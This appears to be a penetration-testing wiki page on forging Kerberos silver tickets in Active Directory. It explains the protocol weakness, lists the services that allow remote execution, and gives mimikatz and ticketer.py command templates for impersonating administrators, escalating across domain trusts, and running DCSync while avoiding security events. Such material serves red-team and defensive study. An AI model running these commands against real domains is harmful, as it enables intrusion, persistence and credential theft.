Exploitation - Kerberos silver tickets

Overview

Service tickets are generated by the Ticket-Granting Service (TGS) of the Key Distribution Center (KDC) and used by clients to access domain resources exposed through service accounts, i.e user accounts that have a ServicePrincipalName (SPN) configured.

Service tickets are generated by the TGS upon reception of a valid Ticket-Granting Ticket (TGT) using:

One of the secrets (RC4 key, whose value is identical to the NTLM hash, or AES 128/256 bits keys) of the krbtgt account (KDC Signature).
One of the secrets of the targeted service account (Server Signature and encryption of the TGS).

However, as the service account has no knowledge of the the krbtgt account's secrets, no verification is done by default on the KDC Signature signature upon receipt and verification of the validity of a service ticket. Thus, in the majority of environment, only the knowledge of one of the secrets of the targeted service account is necessary for the generation of valid service tickets for the service (and renewals of the krbtgt's password do not invalidate the crafted service tickets).

Note that the Kerberos PAC Validation mechanism can be enabled on a service to enforce a systematic verification of the service tickets's Privilege Attribute Certificate (PAC) KDC Signature signature with a request to the KDC. As the additional verification induced by the mechanism requires an exchange between the server hosting the service and the KDC, its activation can cause significant performance degradation.

For more information on the Kerberos protocol, refer to the `ActiveDirectory

Kerberos Golden Tickets` note.

To generate a silver ticket, the following prerequisites are needed:

The fully qualified domain name and the SID of the targeted domain.
The SPN and one of the secrets of the targeted service account.

Computers services and machine account exploitation

Windows systems integrated to an Active Directory domain expose a number of services, executed under the machine account authority. These services can be leveraged to remotely access and execute commands on a machine. As such, the compromise of one of the machine account secrets can be used to generate silver tickets allowing for remote code execution.

Silver tickets for machine services can notably be used for persistence after the compromise of a machine or an Active Directory domain (as the secrets of the machine accounts of all the machines integrated to the domain are stored in the ntds.dit database). Additionally, if a machine exposes the Windows SpoolerService service, through the MS-RPRN MSRPC interface, and is configured to permit the use of NetNTLMv1 (LMCompatibilityLevel attribute set to 2 or lower), an authentication from the machine to an arbitrary host in NetNTLMv1 can be remotely triggered and further captured, to ultimately crack the NetNTLMv1 hash and retrieve the machine account NTLM hash. For more information on the attack refer to the [L7] MSRPC and [ActiveDirectory] NTLM capture and relay notes.

Different services are exposed on Windows systems integrated to an Active Directory domain and can be targeted, through their respective SPN in the form of <SERVICE_NAME>/<MACHINE_HOSTNAME>, for persistence and remote access:

Possible operation Service(s) Description Related note

Possible operation	Service(s)	Description	Related note
`PsExec`-like file system access	`CIFS`	Remote execution of commands using `PsExec`-like utilities or full access to the machine file system.	`Windows - Lateral movements` `[L7] 445 - SMB`
`WMI`	`HOST` `RPCSS`	Remote execution of commands through `Windows Management Instrumentation (WMI)` (`Win32_Process` class for example).	`Windows - Lateral movements`
`WinRM`	Always necessary: `HOST` `HTTP` Host dependant: `WSMAN` `RPCSS`	`PowerShell remoting` through `Windows Remote Management (WinRM)`.	`Windows - Lateral movements` `[L7] 5985-5968 - WSMan`
Windows services	`HOST`	Remote creation and/or execution of Windows services.	`Windows - Lateral movements`
Scheduled tasks	`HOST`	Remote creation and/or execution of Windows scheduled tasks.	`Windows - Lateral movements`
`DCSync` LDAP access	`LDAP`	`LDAP` requests, and notably allows, for `service tickets` to the `LDAP` service of a `Domain Controller`, the conduct of replication operations (`DCSync`).	`[ActiveDirectory] ntds.dit dumping`
`RSAT`	`CIFS` `LDAP` `RPCSS`	Use of the PowerShell cmdlets of the Windows `Remote Server Administration Tools (RSAT)` suite.	`[ActiveDirectory] Domain Recon`

PsExec-like file system access

CIFS

Remote execution of commands using PsExec-like utilities or full access to the machine file system.

Windows - Lateral movements [L7] 445 - SMB

WMI

HOST RPCSS

Remote execution of commands through Windows Management Instrumentation (WMI) (Win32_Process class for example).

Windows - Lateral movements

WinRM

Always necessary: HOST HTTP Host dependant: WSMAN RPCSS

PowerShell remoting through Windows Remote Management (WinRM).

Windows - Lateral movements [L7] 5985-5968 - WSMan

Windows services

HOST

Remote creation and/or execution of Windows services.

Windows - Lateral movements

Scheduled tasks

HOST

Remote creation and/or execution of Windows scheduled tasks.

Windows - Lateral movements

DCSync LDAP access

LDAP

LDAP requests, and notably allows, for service tickets to the LDAP service of a Domain Controller, the conduct of replication operations (DCSync).

[ActiveDirectory] ntds.dit dumping

RSAT

CIFS LDAP RPCSS

Use of the PowerShell cmdlets of the Windows Remote Server Administration Tools (RSAT) suite.

[ActiveDirectory] Domain Recon

The HOST service for Windows machines includes a set of machine built-in Windows services, such as the HTTP, SCM and SCHEDULE services, etc.

The exhaustive list of services exposed on a Windows machine integrated to an Active Directory domain can be retrieved using the following PowerShell command:

# DOMAIN_ROOT_OBJECT = "DC=LAB,DC=AD" for example

Get-ADObject -Identity "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,
<DOMAIN_ROOT_OBJECT>" -properties sPNMappings

Silver tickets generation

The mimikatz utility on Windows and the Impacket's ticketer.py Python script can be used to generate silver tickets:

# (mimikatz) /id: / (ticketer.py) -user-id <USER_RID>
# Impersonated user Relative ID (RID). Default to 500 (Built-in Administrator account RID).

# (mimikatz) /groups: / (ticketer.py) -groups <GROUP_RID | GROUP_RIDS_LIST>
# Impersonated groups membership, in the form of one or a list of groups RID. Default groups RIDs: 513 (Domain Users), 512 (Domain Admins), 520 (Group Policy Creator Owners), 518 (Schema Admins), and 519 (Enterprise Admins, only effective if targeting the root domain).

# (mimikatz) /sids: / (ticketer.py) -extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>
# Additional and arbitrary SID(s) (that may or may not belong to the current domain) to include in the PAC, as if the SIDs were defined in the `SIDHistory` attribute of a domain user.

# (mimikatz) /ptt - Directly inject the generated silver ticket in memory

# From an authorization standpoint, the specified username does not matter.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> [/id:<USER_RID>] [/groups:<GROUP_RID | GROUP_RIDS_LIST>] [/sids:<EXTRA_SID | EXTRA_SIDS_LIST>] /ptt" "exit"

ticketer.py -domain <DOMAIN_FQDN> -domain-sid <DOMAIN_SID> -spn <SERVICE_FULL_SPN> [-nthash <TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | -aesKey <TARGETED_SERVICE_ACCOUNT_AES128_KEY | TARGETED_SERVICE_ACCOUNT_AES256_KEY>] [-user-id <USER_RID>] [-groups <GROUP_RID | GROUP_RIDS_LIST>] -[extra-sid <EXTRA_SID | EXTRA_SIDS_LIST>] <IMPERSONATED_USERNAME>

# Access to a Windows system through WinRM (PowerShell Remoting) using one of the targeted computer secret.
# Silver tickets the HOST and HTTP services are necessary and usually sufficient. Silver tickets for the WSMAN and/or RPCSS services may additionally be required.  
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:host /ptt" "exit"
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_COMPUTER_FQDN> [/rc4:<TARGETED_COMPUTER_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_COMPUTER_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_COMPUTER_ACCOUNT_AES256_KEY>] /service:http /ptt" "exit"

# Impersonates an user member of the "Enterprise Admins" group of the root domain in order to compromise the root domain from any trusted child domain.
# For more information, refer to the "Active Directory - Trusts hopping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_USERNAME> /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /target:<TARGETED_SERVER_FQDN> [/rc4:<TARGETED_SERVICE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_SERVICE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_SERVICE_ACCOUNT_AES256_KEY>] /service:<TARGETED_SERVICE_NAME> /sids:"S-1-5-21-<ROOT_DOMAIN_IDENTIFIER-AUTHORITY>-519" /ptt" "exit"

# Impersonates a Domain Controller in order to conduct DCSync attack without generating Windows "Security" events ("Event 4662: An operation was performed on an object").
# The <IMPERSONATED_DC_RID> can be obtained using:
(New-Object System.Security.Principal.NTAccount("<DOMAIN>","<DC_MACHINE_ACCOUNT")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# For more information, refer to the "Active Directory - ntds.dit dumping" note.
mimikatz.exe "kerberos::golden /user:<IMPERSONATED_DC_MACHINE_ACCOUNT> /domain:<DOMAIN_FQDN> /sid::<DOMAIN_SID> /target:<TARGETED_DC_FQDN> [/rc4:<TARGETED_DC_MACHINE_ACCOUNT_NTLM_HASH> | /aes128:<TARGETED_DC_MACHINE_ACCOUNT_AES128_KEY> | /aes256:<TARGETED_DC_MACHINE_ACCOUNT_AES256_KEY>] /service:ldap /id:<IMPERSONATED_DC_RID> /groups:516 /sids:S-1-5-21-<DOMAIN_IDENTIFIER-AUTHORITY>-516,S-1-5-9" /ptt" "exit"

Silver tickets usage (Pass-the-Ticket)

On Windows, silver tickets generated using mimikatz will be automatically injected in the current logon session if the /ptt option is specified. Otherwise, an exported silver ticket can be injected using mimikatz.exe "kerberos::ptt <TICKET_FILE_PATH> for example.

On Linux, silver tickets generated by ticketer.py, in the credential cache (ccache) format, can be exported in the KRB5CCNAME environment variable for further use through tools supporting the Kerberos protocol, such as others Impacket Python utilities. Note that impackets utilities can only make use of a single Kerberos tickets at a time, which limits the possible usage of the utilities with silver tickets.

Refer to the [ActiveDirectory] Kerberos tickets usage for more information on techniques and tools to leverage silver tickets.

References

https://2014.rmll.info/slides/80/day_3-1010-Benjamin_Delpy-Mimikatz_a_short_journey_inside_the_memory_of_the_Windows_Security_service.pdf https://adsecurity.org/?page_id=1821 TECHNIQUES DE PERSISTANCE ACTIVE DIRECTORY BASÉES SUR KERBEROS - MISC Hors-Série N°20 https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Silver_Ticket_Walkthrough.html

PreviousExploitation - Kerberos tickets usage NextExploitation - Kerberos delegations

Last updated 2 years ago